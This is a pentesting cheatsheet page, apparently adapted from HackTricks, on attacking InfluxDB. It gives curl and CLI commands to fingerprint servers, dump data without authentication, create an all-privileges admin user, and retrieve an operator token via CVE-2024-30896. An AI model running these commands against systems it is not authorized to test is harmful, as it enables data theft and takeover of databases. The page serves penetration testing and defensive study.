daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

8086-pentesting-influxdb.md (9113B)


      1 ---
      2 title: "8086 - Pentesting InfluxDB"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/8086-pentesting-influxdb.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/8086-pentesting-influxdb.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 8086 - Pentesting InfluxDB
     14 
     15 ## Basic Information
     16 
     17 **InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance.
     18 
     19 **Default port**: 8086
     20 
     21 ```text
     22 PORT     STATE SERVICE VERSION
     23 8086/tcp open  http    InfluxDB http admin 1.7.5
     24 ```
     25 
     26 ## Identify & Version (HTTP)
     27 
     28 - v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`.
     29 - v2.x+: `GET /health` returns JSON with the server version and status. Works without auth.<sup>[[1]](#references)</sup>
     30 
     31 ```bash
     32 # v1 banner grab
     33 curl -i http://<host>:8086/ping
     34 
     35 # v2/compat health
     36 curl -s http://<host>:8086/health | jq .
     37 ```
     38 
     39 Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`.
     40 
     41 ## Enumeration
     42 
     43 From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info.
     44 
     45 ### Authentication
     46 
     47 InfluxDB might require authentication or not
     48 
     49 ```bash
     50 # Try unauthenticated CLI (v1 shell)
     51 influx -host <host> -port 8086
     52 > use _internal
     53 ```
     54 
     55 If you **get an error like** this one: `ERR: unable to parse authentication credentials` it means that it's **expecting some credentials**.
     56 
     57 ```text
     58 influx –username influx –password influx_pass
     59 ```
     60 
     61 There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)<sup>[[4]](#references)</sup>
     62 
     63 ### Manual Enumeration (v1 HTTP API / InfluxQL)
     64 
     65 Even when no CLI is available, the HTTP API is usually exposed on port 8086.
     66 
     67 ```bash
     68 # List databases (unauth)
     69 curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"
     70 
     71 # List retention policies of a DB
     72 curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"
     73 
     74 # List users (if auth disabled)
     75 curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"
     76 
     77 # List measurements (tables)
     78 curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"
     79 
     80 # List field keys (columns)
     81 curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"
     82 
     83 # Dump data from a measurement
     84 curl -sG "http://<host>:8086/query" \
     85   --data-urlencode "db=telegraf" \
     86   --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .
     87 
     88 # Force epoch timestamps (useful for tooling)
     89 curl -sG "http://<host>:8086/query" \
     90   --data-urlencode "epoch=ns" \
     91   --data-urlencode "db=telegraf" \
     92   --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
     93 ```
     94 
     95 > [!WARNING]
     96 > In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`
     97 
     98 If authentication is disabled, you can even create users and escalate:
     99 
    100 ```bash
    101 # Create an admin user (v1, auth disabled)
    102 curl -sG "http://<host>:8086/query" \
    103   --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
    104 ```
    105 
    106 The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).<sup>[[3]](#references)</sup>
    107 
    108 #### Show databases
    109 
    110 The found databases are `telegraf` and `internal` (you will find this one everywhere)
    111 
    112 ```bash
    113 > show databases
    114 name: databases
    115 name
    116 ----
    117 telegraf
    118 _internal
    119 ```
    120 
    121 #### Show tables/measurements
    122 
    123 The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity.<sup>[[5]](#references)</sup>
    124 
    125 ```bash
    126 > show measurements
    127 name: measurements
    128 name
    129 ----
    130 cpu
    131 disk
    132 diskio
    133 kernel
    134 mem
    135 processes
    136 swap
    137 system
    138 ```
    139 
    140 #### Show columns/field keys
    141 
    142 The field keys are like the **columns** of the database
    143 
    144 ```bash
    145 > show field keys
    146 name: cpu
    147 fieldKey         fieldType
    148 --------         ---------
    149 usage_guest      float
    150 usage_guest_nice float
    151 usage_idle       float
    152 usage_iowait     float
    153 
    154 name: disk
    155 fieldKey     fieldType
    156 --------     ---------
    157 free         integer
    158 inodes_free  integer
    159 inodes_total integer
    160 inodes_used  integer
    161 
    162 [ ... more keys ...]
    163 ```
    164 
    165 #### Dump Table
    166 
    167 And finally you can **dump the table** doing something like
    168 
    169 ```bash
    170 select * from cpu
    171 name: cpu
    172 time                cpu       host   usage_guest usage_guest_nice usage_idle        usage_iowait        usage_irq usage_nice usage_softirq        usage_steal usage_system        usage_user
    173 ----                ---       ----   ----------- ---------------- ----------        ------------        --------- ---------- -------------        ----------- ------------        ----------
    174 1497018760000000000 cpu-total ubuntu 0           0                99.297893681046   0                   0         0          0                    0           0.35105315947842414 0.35105315947842414
    175 1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101
    176 ```
    177 
    178 ### InfluxDB v2.x API (Token-based)
    179 
    180 InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:
    181 
    182 ```bash
    183 # Basic org, bucket, and auth discovery
    184 TOKEN="<token>"; H="-H Authorization: Token $TOKEN"
    185 
    186 # Health & version
    187 curl -s http://<host>:8086/health | jq .
    188 
    189 # List organizations
    190 curl -s $H http://<host>:8086/api/v2/organizations | jq .
    191 
    192 # List buckets
    193 curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .
    194 
    195 # List authorizations (requires perms)
    196 ORGID=<org_id>
    197 curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .
    198 
    199 # Query data with Flux
    200 curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
    201   -X POST http://<host>:8086/api/v2/query \
    202   --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
    203 ```
    204 
    205 Notes
    206 - For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests.
    207 - In v2, the HTTP `Authorization` header must be in the form `Token <value>`.
    208 
    209 ### Automated Enumeration
    210 
    211 ```bash
    212 msf6 > use auxiliary/scanner/http/influxdb_enum
    213 ```
    214 
    215 ### Recent vulns and privesc of interest (last years)
    216 
    217 - InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org.<sup>[[2]](#references)</sup> Quick test:
    218 
    219 ```bash
    220 # Using a low-priv/all-access token tied to the default org
    221 curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
    222   'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
    223 # Look for entries of type "operator" and extract the raw token (if present)
    224 ```
    225 
    226 - Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.
    227 
    228 
    229 ## References
    230 
    231 - [1] [InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`)](https://docs.influxdata.com/influxdb/v1/tools/api/)
    232 - [2] [CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x (Wiz)](https://www.wiz.io/vulnerability-database/cve/cve-2024-30896)
    233 - [3] [Getting to know InfluxDB (oznetnerd)](https://oznetnerd.com/2017/06/11/getting-know-influxdb/)
    234 - [4] [InfluxDB-Exploit-CVE-2019-20933 PoC](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
    235 - [5] [InfluxDB v1.2 Documentation - Getting Started](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/)